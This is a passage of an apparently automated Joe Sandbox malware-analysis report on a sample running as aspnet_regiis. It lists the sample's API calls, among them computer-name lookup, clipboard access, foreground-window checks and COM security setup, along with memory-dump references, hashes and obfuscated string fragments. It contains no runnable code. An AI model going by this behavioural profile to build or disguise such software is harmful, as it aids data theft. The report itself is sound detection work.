                                                                              • Associated: 00000003.00000002.3270997421.00000000027A4000.00000040.00000400.00020000.00000000.sdmp
                                                                              • Associated: 00000003.00000002.3271027498.00000000027B2000.00000002.00000400.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_2760000_aspnet_regiis.jbxd
                                                                              Similarity
                                                                              • API ID: ComputerName
                                                                              • String ID: EXCm$_RV]
                                                                              • API String ID: 3545744682-74084992
                                                                              • Opcode ID: f3b9b520b57548f7ef2776ea4c09f1b2de0814eae6a7862ef424d87f6bfc0997
                                                                              • Instruction ID: 243b2276877bf6eff03c7995b7effb61a64ba8bdca7a1914cbeb6e2b0754677b
                                                                              • Opcode Fuzzy Hash: f3b9b520b57548f7ef2776ea4c09f1b2de0814eae6a7862ef424d87f6bfc0997
                                                                              • Instruction Fuzzy Hash: 5E3107752407428FD7188F29C490776FBD2EF96210B1DC65EC4E787792DB78A845CB11

                                                                              Control-flow Graph
                                                                              control_flow_graph 1330 278a9da-278a9f9 1332 278aa00-278aa5c 1330->1332 1332->1332 1333 278aa5e-278aa63 1332->1333 1334 278aa8d-278aa96 1333->1334 1335 278aa65-278aa72 1333->1335 1337 278aa99-278aad1 GetComputerNameExA 1334->1337 1336 278aa80-278aa89 1335->1336 1336->1336 1338 278aa8b 1336->1338 1338->1337
                                                                              APIs
                                                                              • GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 0278AAAC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.3270915930.0000000002761000.00000020.00000400.00020000.00000000.sdmp, Offset: 02760000, based on PE: true
                                                                              • Associated: 00000003.00000002.3270891830.0000000002760000.00000040.00000400.00020000.00000000.sdmp
                                                                              • Associated: 00000003.00000002.3270969965.00000000027A1000.00000002.00000400.00020000.00000000.sdmp
                                                                              • Associated: 00000003.00000002.3270997421.00000000027A4000.00000040.00000400.00020000.00000000.sdmp
                                                                              • Associated: 00000003.00000002.3271027498.00000000027B2000.00000002.00000400.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_2760000_aspnet_regiis.jbxd
                                                                              Similarity
                                                                              • API ID: ComputerName
                                                                              • String ID: EXCm$_RV]
                                                                              • API String ID: 3545744682-74084992
                                                                              • Opcode ID: 4c861c2ac2fc421d5b6f0da52a47eb53f684c32064f9f3598220585b63ea40fa
                                                                              • Instruction ID: 02c53a81e9d1efe3d6d337b33e6550775c67b9031ea2d0338387185193d48260
                                                                              • Opcode Fuzzy Hash: 4c861c2ac2fc421d5b6f0da52a47eb53f684c32064f9f3598220585b63ea40fa
                                                                              • Instruction Fuzzy Hash: F1212571240B028BE31CCF39C89076AF7D3EFD621072DC66DC4A68B796DA789842CB40
                                                                              APIs
                                                                              • CoInitializeEx.OLE32(00000000,00000002), ref: 0276CD7A
                                                                              • CoInitializeEx.COMBASE(00000000,00000002), ref: 0276CEBF
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.3270915930.0000000002761000.00000020.00000400.00020000.00000000.sdmp, Offset: 02760000, based on PE: true
                                                                              • Associated: 00000003.00000002.3270891830.0000000002760000.00000040.00000400.00020000.00000000.sdmp
                                                                              • Associated: 00000003.00000002.3270969965.00000000027A1000.00000002.00000400.00020000.00000000.sdmp
                                                                              • Associated: 00000003.00000002.3270997421.00000000027A4000.00000040.00000400.00020000.00000000.sdmp
                                                                              • Associated: 00000003.00000002.3271027498.00000000027B2000.00000002.00000400.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_2760000_aspnet_regiis.jbxd
                                                                              Similarity
                                                                              • API ID: Initialize
                                                                              • String ID:
                                                                              • API String ID: 2538663250-0
                                                                              • Opcode ID: a0ba0ddfad2f15655209425ccd1956b7b0e72329cdcc84998cc96603ee035672
                                                                              • Instruction ID: 5ae6f9f4dc2b0f2b32b1747238881ffb528a77457e97914791688f7e2e028b00
                                                                              • Opcode Fuzzy Hash: a0ba0ddfad2f15655209425ccd1956b7b0e72329cdcc84998cc96603ee035672
                                                                              • Instruction Fuzzy Hash: 9641C9B4D10B40AFD370EF39D90B7127EB4AB05260F508B1EF9E6866D4E635A4198BD3
                                                                              APIs
                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0276CF4F
                                                                              • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0276CF72
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.3270915930.0000000002761000.00000020.00000400.00020000.00000000.sdmp, Offset: 02760000, based on PE: true
                                                                              • Associated: 00000003.00000002.3270891830.0000000002760000.00000040.00000400.00020000.00000000.sdmp
                                                                              • Associated: 00000003.00000002.3270969965.00000000027A1000.00000002.00000400.00020000.00000000.sdmp
                                                                              • Associated: 00000003.00000002.3270997421.00000000027A4000.00000040.00000400.00020000.00000000.sdmp
                                                                              • Associated: 00000003.00000002.3271027498.00000000027B2000.00000002.00000400.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_2760000_aspnet_regiis.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeSecurity
                                                                              • String ID:
                                                                              • API String ID: 640775948-0
                                                                              APIs
                                                                              • LoadLibraryExW.KERNEL32(?,00000000,EDECCBF2), ref: 02769FBE
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID:
                                                                              • API String ID: 1029625771-0
                                                                              APIs
                                                                              • GetForegroundWindow.USER32 ref: 0279CFB0
                                                                              Similarity
                                                                              • API ID: ForegroundWindow
                                                                              • String ID:
                                                                              • API String ID: 2020703349-0
                                                                              APIs
                                                                              • GetUserDefaultUILanguage.KERNELBASE ref: 027966F6
                                                                              Similarity
                                                                              • API ID: DefaultLanguageUser
                                                                              • String ID:
                                                                              • API String ID: 95929093-0
                                                                              APIs
                                                                              • RtlReAllocateHeap.NTDLL(?,00000000), ref: 0279CC65
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1279760036-0
                                                                              APIs
                                                                              Similarity
                                                                              • API ID: BlanketProxy
                                                                              • String ID:
                                                                              • API String ID: 3890896728-0
                                                                              APIs
                                                                              Similarity
                                                                              • API ID: BlanketProxy
                                                                              • String ID:
                                                                              • API String ID: 3890896728-0
                                                                              APIs
                                                                              • RtlFreeHeap.NTDLL(?,00000000,?,02772F77), ref: 0279B140
                                                                              Similarity
                                                                              • API ID: FreeHeap
                                                                              • String ID:
                                                                              • API String ID: 3298025750-0
                                                                              APIs
                                                                              • RtlAllocateHeap.NTDLL(?,00000000,?,8B0C2C00,027688DE,69681CE6), ref: 0279B110
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1279760036-0
                                                                              APIs
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                              • String ID: ?
                                                                              • API String ID: 2832541153-1684325040
                                                                              APIs
                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 02786D66
                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 02786DE4
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: EnvironmentExpandStrings
                                                                              • String ID: 9R9P$Q^$U>@<
                                                                              • API String ID: 237503144-3277335807
                                                                              APIs
                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000), ref: 027834FB
                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000), ref: 02783598
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: EnvironmentExpandStrings
                                                                              • String ID: &
                                                                              • API String ID: 237503144-3835491774
                                                                              APIs
                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 02782E17
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: EnvironmentExpandStrings
                                                                              • String ID: eb$zx
                                                                              • API String ID: 237503144-2522594701
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.3270915930.0000000002761000.00000020.00000400.00020000.00000000.sdmp, Offset: 02760000, based on PE: true
                                                                              • Associated: 00000003.00000002.3270891830.0000000002760000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270969965.00000000027A1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270997421.00000000027A4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3271027498.00000000027B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_2760000_aspnet_regiis.jbxd
                                                                              Similarity
                                                                              • API ID: AllocString
                                                                              • String ID: ,$0$5$6$9$>$>$@$B$D$F$H$J$L$N$Q$X$\$^$`$`$a$b$b$d$f$f$g$h$j$k$k$l$l$n$p$r$t$v$x$z$|$~
                                                                              • API String ID: 2525500382-2493123460
                                                                              • Opcode ID: 322bfb60814e7cf410d3ef98d1dceddc15a9685968c0012298d6c120d77efdfc
                                                                              • Instruction ID: d0bbf1022792954a88cb333b8322d40e0b27c3bb5f53e3687fbf2730578df08d
                                                                              • Opcode Fuzzy Hash: 322bfb60814e7cf410d3ef98d1dceddc15a9685968c0012298d6c120d77efdfc
                                                                              • Instruction Fuzzy Hash: 0191A22050D7C1CDE332C738885878BBFD26BA3228F084A9DD5E85B2D2C7BA4559C767
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.3270915930.0000000002761000.00000020.00000400.00020000.00000000.sdmp, Offset: 02760000, based on PE: true
                                                                              • Associated: 00000003.00000002.3270891830.0000000002760000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270969965.00000000027A1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270997421.00000000027A4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3271027498.00000000027B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_2760000_aspnet_regiis.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$ClearInit
                                                                              • String ID: #$$$)$-$0$2$2$2$5$5$=$@$B$H$J$L$N$P$R$T$V$Z$\$]$^
                                                                              • API String ID: 2610073882-2983549690
                                                                              • Opcode ID: b205f4a4d40d4e6e44e10bc4dfc8f9c2ad1e01b58c0f9e087d76705f33dca991
                                                                              • Instruction ID: a0a8bc66703ad382627d827b98765d3cb44d61f786446865351592880bd5809e
                                                                              • Opcode Fuzzy Hash: b205f4a4d40d4e6e44e10bc4dfc8f9c2ad1e01b58c0f9e087d76705f33dca991
                                                                              • Instruction Fuzzy Hash: B841497150C3C08AE366DB28C49838FBFE16BE6308F48595DE4D85B382D7B98509CB97